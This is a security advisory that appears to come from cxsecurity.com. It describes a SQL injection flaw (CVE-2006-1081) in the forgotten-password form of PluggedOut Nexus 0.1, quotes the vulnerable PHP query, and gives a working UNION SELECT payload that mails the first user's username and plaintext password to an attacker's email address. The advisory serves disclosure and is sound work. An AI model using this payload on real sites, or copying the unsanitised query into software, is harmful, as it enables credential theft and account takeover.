PluggedOut Nexus SQL injection

2006.03.05
Credit: Hamid Ebadi
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-1081
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

PluggedOut Nexus SQL injection Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each others interests, and communicate with one another either through a private messaging system, or via chat requests and forums. Project : PluggedOut Nexus Version : 0.1 Author : Jonathan Beckett Home : http://www.pluggedout.com Credit: The information has been provided by Hamid Ebadi . ( Hamid Network Security Team): admin[AT]hamid[o]ir The original article can be found at: http://hamid.ir/security/ Vulnerable Systems:PluggedOut Nexus 0.1 http://localhost/Nexus/forgotten_password.php in this address If you fill the private email address that you used while creating your account into the form , the server will send you an email to that address with your login details Input passed to the "email" parameter in "forgotten_password.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. test: in E-Mail Address form enter ' and press Send Request you will redirect to http://localhost/Nexus/site_problem.php and see : Problem with Nexus website A problem has occurred with the Nexus website - this was not your fault, and the administrators probably already know about it. Vulnerable Code: The following lines in "forgotten_password.php" : ---------------------------~=[Vulnerable Code]=~--------------------------- if ($_POST["submit"]!=""){ $con = db_connect(); $sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users WHERE cEMailPrivate='".$_POST["email"]."'"; $result = mysql_query($sql,$con); if ($result!=false){ if (mysql_num_rows($result)>0){ $row = mysql_fetch_array($result); $from = $site_admin_email; $to = $row["cEMailPrivate"]; $subject = "Reminder Username/Password from ".$site_long_name.""; $body = "This email has been sent following a request for a reminder username/password in the ".$site_long_name." website.nn" ."Your account details are as follows;n" ." Username : ".$row["cUsername"]."n" ." Password : ".$row["cPassword"]."nn" ."If you did not request this reminder message, please contact the ".$site_long_name." administrator (".$admin_email.")n"; send_email($from,$to,$subject,$body); ---------------------------~=[/Vulnerable Code]=~--------------------------- exploit: insert this code in E-Mail Address form (http://localhost/Nexus/forgotten_password.php) : hamidnetworksecurityteam' union select cUsername,cPassword,'ATTACKER (at) EMAIL (dot) ADDR [email concealed]ESS' from nexus_users WHERE nUserId=1 and '1'='1 and ATTACKER (at) EMAIL (dot) ADDR [email concealed]ESS recieve email contain username & password for userID=1 . Signature


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top